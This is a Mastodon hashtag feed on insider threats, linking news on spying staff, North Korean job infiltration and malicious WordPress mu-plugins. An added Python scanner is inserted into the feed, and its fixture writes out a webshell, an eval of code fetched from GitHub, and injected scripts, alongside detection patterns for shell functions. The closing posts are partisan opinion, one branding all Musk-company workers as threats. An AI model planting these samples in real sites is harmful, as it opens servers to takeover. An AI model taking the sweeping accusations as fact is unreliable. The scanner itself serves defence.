ioc.exchange is one of the many independent Mastodon servers you can use to participate in the fediverse.
INDICATORS OF COMPROMISE (IOC) InfoSec Community within the Fediverse. Newbies, experts, gurus - Everyone is Welcome! Instance is supposed to be fast and secure.

#insiderthreat

And here's another reminder of the insider threat if you don't investigate your employees' or consultants' backgrounds and claimed credentials carefully enough. @briankrebs has the story and how a number of criminal cases may now be appealed or overturned:

Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe:

krebsonsecurity.com/2025/04/cy

krebsonsecurity.com · Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe – Krebs on Security

Today's reminder of the insider threat involves a pharmacist in Maryland who, over a period of 8 years or more, used keyloggers and installed spyware on about 400 computers at the University of Maryland Medical System so he could spy on female co-workers in private moments at work (such as changing clothes or breastfeeding their babies) and in their homes. He was reportedly fired in October 2024, and was able to get another job in another healthcare facility in Maryland because there have been no criminal charges filed against him yet and UMMS apparently didn't alert his new employer.

If Maryland law is like my state's laws, the hospital may be barred legally from revealing what happened if asked for a recommendation by the new employer. And it seems the Maryland state pharmacy board can't just suspend a license unless there's been a conviction, so the failure to have criminal charges filed already seems to have put more potential victims at risk.

Unsurprisingly, a potential class action lawsuit has already been filed against UMMS with six plaintiffs so far. There are estimates that there are more than 80 victims of the now-former employee.

Some of the media coverage on the case: thedailyrecord.com/2025/04/04/

Maryland Daily Record · Six women sue UMMS, claiming staffer spied on them after security breach · By Ian Round

The North Koreans and Russians have been busy, insiders abound, and attacker tradecraft continues to evolve!

Catch all this and more in our latest wrap-up of the day's news:

🗞️ opalsec.io/daily-news-update-m

There are a few noteworthy stories to get across - here's the TL;DR to get you up to speed:

🕵️ North Korean Infiltration: This is way bigger than many think. DPRK nationals are landing jobs inside global companies, gaining privileged access ("keys to the kingdom" level!). DTEX reports active investigations in 7% of their Fortune Global 2000 clients, and CrowdStrike notes nearly 40% of their NK-related IR cases involved insiders. They move fast post-hire, pivoting to supply chains and installing RATs disguised as onboarding. Watch out for highly anomalous login behaviour (like days-long sessions!). Rigorous remote hiring checks (camera on, resume checks, comms style) are crucial.

🎣 ClickFix Tactics by Lazarus: The infamous North Korean group is evolving its 'Contagious Interview' campaign (now dubbed 'ClickFake' by Sekoia). They're targeting crypto job seekers (shifting focus to non-tech roles too!) with fake website/document errors ('ClickFix'). These prompt users to run PowerShell/curl commands, dropping the 'GolangGhost' backdoor. Watch out for lures impersonating giants like Coinbase or Kraken. Sekoia has shared YARA rules – definitely worth checking out.

💻 WordPress MU-Plugin Abuse: Bad actors are getting stealthy by hiding malicious code in WordPress "Must-Use Plugins" (wp-content/mu-plugins/). These execute automatically on every page load without activation, making them hard to spot. Sucuri is seeing redirects to fake browser updates, webshell backdoors fetching code from GitHub, and JS hijackers replacing content or links. Keep those instances patched, clean up unused plugins/themes, and lock down admin accounts (MFA!).

Check out what else happened in the past 24 hours, and subscribe to get each edition straight to your inbox:
📨 opalsec.io/daily-news-update-m

Opalsec · Daily News Update: Monday, April 1, 2025 (Australia/Melbourne) · DPRK actors actively infiltrate global businesses, gaining privileged access and pivoting to 3rd parties. Lazarus adopts "ClickFix" tactics, luring job seekers and targeting non-technical roles. Attackers abuse malicious WordPress mu-plugins, a stealthy technique to inject code into every page.
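The mu-plugin point in the post above is worth turning into a check you can actually run. The script below is an added example, not code from the post, from Sucuri or from WordPress: it walks a site's wp-content/mu-plugins/ directory and flags files showing the behaviours the post lists (redirects to fake browser updates, backdoors fetching code from GitHub, injected scripts) plus generic obfuscation and webshell tells. The indicator regexes, file names, plugin bodies and hostnames are constructed for illustration and are not a vendor signature set. The one WordPress fact it relies on is that every top-level *.php file in mu-plugins/ is loaded on every request with no activation step, while files in subdirectories run only if a top-level file includes them; the scanner reports that distinction as auto_loaded so you know which hits execute on every page load.

```python
"""Triage a WordPress wp-content/mu-plugins/ directory for suspicious auto-loaded code.

Added example; not code from the post, Sucuri or WordPress. The indicator
regexes, sample plugin files and hostnames are constructed for illustration.
"""
import re
import tempfile
from pathlib import Path

# Regexes for the behaviours the post describes (redirects, remote code fetched
# from GitHub, injected scripts) plus generic obfuscation and webshell tells.
# These are assumptions to tune per site, not a vendor signature set.
INDICATORS = {
    "obfuscation": re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(file_get_contents|fopen|curl_init|wp_remote_get)\s*\(\s*['\"]https?://", re.I),
    "github_fetch": re.compile(r"raw\.githubusercontent\.com|gist\.github\.com", re.I),
    "redirect": re.compile(r"\bheader\s*\(\s*['\"]Location:|\bwp_redirect\s*\(|(window|document)\.location", re.I),
    "script_injection": re.compile(r"<script[^>]*\ssrc\s*=", re.I),
    "webshell": re.compile(r"\b(system|shell_exec|passthru|exec|proc_open)\s*\(\s*\$_(GET|POST|REQUEST)", re.I),
}


def scan_mu_plugins(wp_content) -> list[dict]:
    """Return one finding per file under mu-plugins/ that matches any indicator.

    WordPress auto-loads every top-level *.php in mu-plugins/ without activation;
    files in subdirectories only run if a top-level file includes them, so
    'auto_loaded' marks the hits that execute on every request.
    """
    mu_dir = Path(wp_content) / "mu-plugins"
    findings = []
    if not mu_dir.is_dir():
        return findings
    for path in sorted(mu_dir.rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            findings.append({
                "file": path.relative_to(mu_dir).as_posix(),
                "auto_loaded": path.parent == mu_dir and path.suffix.lower() == ".php",
                "indicators": hits,
            })
    return findings


# Constructed fixture: one benign mu-plugin plus files modelled on the three
# behaviours in the post and a stashed webshell. Hostnames/paths are made up.
SAMPLE_FILES = {
    "site-tweaks.php": "<?php\n/* Plugin Name: Site tweaks */\n"
                       "add_filter('xmlrpc_enabled', '__return_false');\n",
    "update-notice.php": "<?php\n"  # redirect Windows visitors to a fake browser update
                         "if (strpos($_SERVER['HTTP_USER_AGENT'], 'Windows') !== false) {\n"
                         "    header('Location: https://browser-update.example.invalid/');\n    exit;\n}\n",
    "cache-helper.php": "<?php\n"  # backdoor pulling code from GitHub and evaluating it
                        "$c = file_get_contents('https://raw.githubusercontent.com/example/repo/main/c.txt');\n"
                        "eval(base64_decode($c));\n",
    "seo-links.php": "<?php\n"  # injects a remote script into every page footer
                     "add_action('wp_footer', function () {\n"
                     "    echo '<script src=\"https://cdn.example.invalid/l.js\"></script>';\n});\n",
    "lib/shell.php": "<?php\n"  # webshell; runs only if a top-level file includes it
                     "if (isset($_GET['c'])) { system($_GET['c']); }\n",
}


def build_sample_tree(root: Path) -> Path:
    """Write SAMPLE_FILES under root/wp-content/mu-plugins and return the wp-content path."""
    mu_dir = root / "wp-content" / "mu-plugins"
    for rel, body in SAMPLE_FILES.items():
        target = mu_dir / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return mu_dir.parent


def demo() -> list[dict]:
    """Build the constructed fixture in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_mu_plugins(build_sample_tree(Path(tmp)))


if __name__ == "__main__":
    for f in demo():
        loaded = "AUTO-LOADED" if f["auto_loaded"] else "not auto-loaded"
        print(f"{f['file']:20} {loaded:16} {', '.join(f['indicators'])}")
```

Point scan_mu_plugins() at a real wp-content directory to use it outside the demo. Treat any auto-loaded hit as live code running on every request, and review the non-auto-loaded hits too: a one-line `require` in an otherwise innocent top-level file is enough to pull them in.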

Two Good Reads.
talkingpointsmemo.com/edblog/t

"Musk’s anger at federal regulators powered his dedication to the wilding spree...

the plain facts of what both pieces describe make clear that the best conceptual model for #DOGE is something between an #InsiderThreat action and a #terrorist operation. The emphasis on secrecy, misdirection and illegality is all there, the focus on seizing control of central nodes of #power & destroying things"


"Allies of Musk also began arriving at tech hubs in the federal government before Inauguration Day — the first hint of the scope of his incursion."

#GiftLink
nytimes.com/2025/02/28/us/poli

I recommend reading the whole article. You can do so even without a subscription by using the above link.⬆️

#ElonMusk #Musk #Coup

Robert Evans: Democratic Insiders Are Sharing A Warning About Curtis Yarvin, Elon Musk & Neoreactionaries. DNC employees and think tank workers are spreading a document about the Neoreactionary threat to democracy.
#coup #technofascism #InsiderThreat #authoritarianism #neoreactionary
shatterzone.substack.com/p/dem

Shatter Zone · Democratic Insiders Are Sharing A Warning About Curtis Yarvin, Elon Musk & Neoreactionaries · By The Only Robert Evans

This petty suggestion is probably an indication that at least one Five Eyes partner has exhibited a rational response to Trump's election and stopped sharing sensitive intelligence. As they all should have last November. It's not like they don't know what a security threat Trump and his goons represent. I'm sure they're only sharing limited intelligence without risk of damage when it's funneled directly to Putin. I mean, of course they are. #intelligence #InsiderThreat #coup #natsec ft.com/content/2dfa3c11-64a7-4

Financial Times · White House official pushes to axe Canada from Five Eyes intelligence group · By Ilya Gridneff

Here Are the Digital Clues to What Musk Is Really Up To

#GiftLink
nytimes.com/2025/02/21/opinion

#Musk is "exploiting vulnerabilities that are built into the nation’s technological systems, operating as what #cybersecurity experts call an #InsiderThreat...

Modern #digital systems supercharge that #threat by consolidating more & more #information from many distinct realms.

...reams of classified #data on a thumb drive."

#elonmusk has made it clear that he's an active, fast moving threat -- to the United States, to #democracy, to #truth and to #justice across the globe.

His supporters and employees are likewise a threat. Every worker at #SpaceX or #Tesla or any of his companies not looking to leave is an accomplice or actively sabotaging the fascist are threats as well. They should all be treated as an #insiderthreat . Maybe they can be reasoned with, but their continued support of Musk cannot be tolerated.